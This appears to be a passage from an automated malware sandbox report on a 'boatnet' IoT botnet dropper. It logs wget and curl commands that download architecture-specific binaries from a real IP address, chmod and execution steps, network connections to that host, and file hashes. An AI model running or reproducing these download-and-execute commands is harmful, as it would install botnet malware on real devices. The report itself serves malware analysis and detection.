[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/819-1-0x00400000-0x00452a58-memory.dmp